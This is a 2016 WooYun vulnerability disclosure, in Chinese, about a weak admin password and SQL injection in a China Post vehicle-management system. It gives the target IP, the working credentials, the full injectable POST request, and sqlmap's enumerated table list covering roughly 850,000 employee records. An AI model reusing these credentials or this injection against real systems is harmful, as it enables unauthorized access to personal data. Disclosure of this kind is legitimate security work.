当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187847

漏洞标题:中国邮政某系统弱口令及SQL注入涉及80多万员工信息

相关厂商:中国邮政集团公司信息技术局

漏洞作者: wps2015

提交时间:2016-03-23 07:47

修复时间:2016-05-07 08:19

公开时间:2016-05-07 08:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-23: 细节已通知厂商并且等待厂商处理中
2016-03-23: 厂商已经确认,细节仅向厂商公开
2016-04-02: 细节向核心白帽子及相关领域专家公开
2016-04-12: 细节向普通白帽子公开
2016-04-22: 细节向实习白帽子公开
2016-05-07: 细节向公众公开

简要描述:

弱口令进系统+SQL注入

详细说明:

问题站点:http://211.156.198.57
弱口令:ADMIN 888888

1.png


在揽收管理---揽收资源--车辆维护处,车牌号和车型字段存在sql注入

2.png


POST /clgl/clxxbAction_querypage.action HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=utf-8
X-Requested-With: XMLHttpRequest
_eosAjax: xml
encoding: utf-8
Referer: http://211.156.198.57/jsp/yzznzd/clgl/clgl_cx.jsp
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: 211.156.198.57
Content-Length: 516
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=xsSdwaOjxEzsIBECirXu1KTyGjTF1ujWibO8ulKxCnlLQyrySC5e!1358030613
submitType=2&ajax=<?xml version="1.0" encoding="utf-8"?><root><params><param><key>orgcode</key><value></value></param><param><key>orgcodeOthers</key><value></value></param><param><key>vXjjgbz</key><value>0</value></param><param><key>vCph</key><value>2*</value></param><param><key>vClzt</key><value></value></param><param><key>vCx</key><value>3</value></param></params>
<data><criteria><_entity></_entity></criteria><page><begin>0</begin><length>10</length><count>-1</count><isCount>true</isCount></page></data></root>


查询抓包到sqlmap中,24库

3.png


当前库

Database: YZZNZD
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| ZNZD_T_DEV | 22836726 |
| ZNZD_T_PDADLB | 16248560 |
| ZHW_T_LOG | 15144408 |
| ZNZD_T_LTYGPSB | 2771925 |
| TX_T_CSXXB | 1656479 |
| AC_OPERATORROLE_BACK | 1453543 |
| YZTD_T_YJXXB | 1337742 |
| AC_OPERATORROLE | 1081814 |
| ZJ_T_ZFCS | 1073134 |
| OM_EMPORG | 929456 |
| ZNZD_T_ZDBBXXB | 921485 |
| ZJ_T_DZYHXX | 896119 |
| OM_EMPLOYEE | 852420 |
| AC_OPERATOR | 851572 |
| ZJ_T_DZYHZDJG | 725500 |
| ZJ_T_DZYHZDJG_BAK | 705840 |
| TX_T_CSWJDJB | 617281 |
| ZNZD_T_ERRLOG | 530825 |
| ZNZD_T_GXTYSJGB | 379680 |
| ZNZD_T_CONFIG | 215879 |
| ZNZD_T_SBXXB | 209276 |
| T_SYS_LOGINLOG | 181842 |
| ZNZD_T_PDAXTB | 152364 |
| YZTD_T_ZQWDJGB | 143809 |
| YZTD_T_ZQWDJGB_0812 | 136225 |
| ZHW_T_JGLSGXB | 135240 |
| TX_T_JSWJXXB | 129743 |
| OM_ORGANIZATION_20141014 | 124473 |
| OM_ORGANIZATION | 102608 |
| YZTD_T_ZQWDJGB_TMP | 98695 |
| OM_ORGANIZATION_BACK | 93550 |
| ZJ_T_ZFZTCS | 83168 |
| TNP_T_YYJGB | 61068 |
| YZTD_T_ZQWDJGB_1216 | 54853 |
| ABF_T_YGFJXXB | 37931 |
| TNP_T_TDJGB | 31757 |
| YZTD_T_JGQHYB | 26843 |
| ZNZD_T_SBXXB_BAK | 18574 |
| YZTD_T_TDJGXZQHDZB | 17579 |
| ZHW_T_YGB_HBBAK | 14799 |
| OM_EMPGROUP | 12308 |
| ZNZD_T_YGUPDATE | 7553 |
| ABF_T_ZZJGGXSB | 4508 |
| ABF_T_JGFJXXB | 4175 |
| ZNZD_T_GGFBJGDYB | 4108 |
| SYS_EXPORT_SCHEMA_04 | 3526 |
| SYS_EXPORT_SCHEMA_03 | 3514 |
| ZNZD_T_GGHFRYDYB | 3479 |
| SYS_EXPORT_SCHEMA_02 | 3400 |
| SYS_EXPORT_SCHEMA_01 | 3394 |
| TAB_BOROUGH | 3177 |
| TAB_ORGAN | 2774 |
| ZJ_T_QHYB | 2621 |
| ZJ_T_GNDM | 2480 |
| ZNZD_T_GGFBJSDYB | 1972 |
| ZHW_T_JGB_HBBAK | 1604 |
| ZNZD_T_TDJGB | 1604 |
| YZTD_T_PBB | 1334 |
| OM_PARTYROLE | 1186 |
| ZNZD_T_LOG | 1011 |
| TAB_CHYZBM | 949 |
| OM_GROUPRANGE | 898 |
| OM_GROUP | 796 |
| ABF_T_RYKGLJG | 774 |
| ZNZD_T_GGXXB | 759 |
| AC_ROLEFUNC | 659 |
| ZJ_T_ZFZTCS_BAK | 590 |
| ZHW_T_YGB | 563 |
| ZNZD_T_JKPZB | 534 |
| OM_EMPPOSITION | 526 |
| AC_OPERATOR_JT | 507 |
| AC_OPERATORROLE_JT | 507 |
| OM_EMPLOYEE_JT | 507 |
| OM_EMPORG_JT | 507 |
| ZNZD_T_GXTYSJGB_JT | 507 |
| YZTD_T_ZQWDJGB_WUHAN | 449 |
| ZJ_T_YWCP | 364 |
| EOS_DICT_ENTRY | 345 |
| TAB_CITY | 343 |
| TAB_T_JKPZB | 323 |
| YZTD_T_PBJHB | 254 |
| ABF_T_DBSYB | 198 |
| ZNZD_T_ZQJGYHYSB | 174 |
| ZNZD_T_BBJGDYB | 157 |
| EOS_UNIQUE_TABLE | 142 |
| ZNZD_T_PLQYRYB | 127 |
| ABF_T_EDUCATION | 122 |
| EOS_DICT_TYPE | 112 |
| ZNZD_T_PLQYGPSB | 107 |
| ZNZD_T_DDJBXXB | 96 |
| AC_FUNCGROUP | 95 |
| AC_FUNCTION | 93 |
| ABF_T_RYKGLJG_BAK | 84 |
| ZNZD_T_LSRWCBB | 81 |
| ZNZD_T_ZDBBSJB | 78 |
| PDA_T_JSQXB | 72 |
| ZNZD_T_KHXLZXB | 71 |
| EOS_DICT_ENTRY_I18N | 68 |
| PDA_T_FUNC | 67 |
| ZNZD_T_CLXXB | 59 |
| ZHW_T_JGB | 51 |
| ZHW_T_JGB_JT | 51 |
| ZNZD_T_DLXXB | 42 |
| ZNZD_T_DEFCONF_DEF | 41 |
| ZNZD_T_PLQYB | 38 |
| ZNZD_T_KHTSXXB | 33 |
| ZNZD_T_PLXLB | 32 |
| TAB_PROVINCE | 31 |
| ZNZD_T_SJYJYHB | 30 |
| AC_APPLICATION | 29 |
| ZNZD_T_PLXLAPB | 28 |
| ZNZD_T_KHXX | 21 |
| ZNZD_T_YWCPB | 19 |
| TX_T_CSPZB | 18 |
| ZNZD_T_PLYWHZB | 17 |
| EOS_DICT_TYPE_I18N | 16 |
| ZHXX_T_TSXXB | 16 |
| ZNZD_T_KHXXB | 15 |
| ZNZD_T_PBJHXX | 13 |
| ZNZD_T_PLPBXXB | 13 |
| ZNZD_T_WXYHXXB | 13 |
| TAB_USERMAP | 12 |
| ZNZD_T_CSXXB | 12 |
| ZNZD_T_SYSPAGE | 12 |
| PDA_T_UJS | 11 |
| AC_ROLE | 10 |
| PDA_T_UMAP | 10 |
| OM_EMPLOYEE_SJLS | 9 |
| PDA_T_ROLE | 8 |
| PDA_T_USER | 8 |
| O_ORG | 7 |
| ABF_T_GGB | 6 |
| TAB_INTERFACE | 6 |
| TAB_USER | 6 |
| EOS_QRTZ_LOCKS | 5 |
| TAB_T_DICTION | 4 |
| ABF_T_ZZJGSB | 3 |
| OM_POSITION | 3 |
| ZHXX_T_VERSION | 3 |
| ZNZD_T_DEFCONF | 2 |
| ABF_T_JGFJZDXXDMB | 1 |
| EOS_QRTZ_FIRED_TRIGGERS | 1 |
| EOS_QRTZ_SIMPLE_TRIGGERS | 1 |
| TAB_TERMINAL | 1 |
| TDGJ_T_VERSION | 1 |
| ZNZD_T_DBSYB | 1 |
| ZNZD_T_DBYSB | 1 |
+--------------------------+---------+


OM_EMPLOYEE 852420

4.png


AC_OPERATOR 851572

5.png


漏洞证明:

5.png

修复方案:

过滤

版权声明:转载请注明来源 wps2015@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-03-23 08:19

厂商回复:

谢谢。

最新状态:

暂无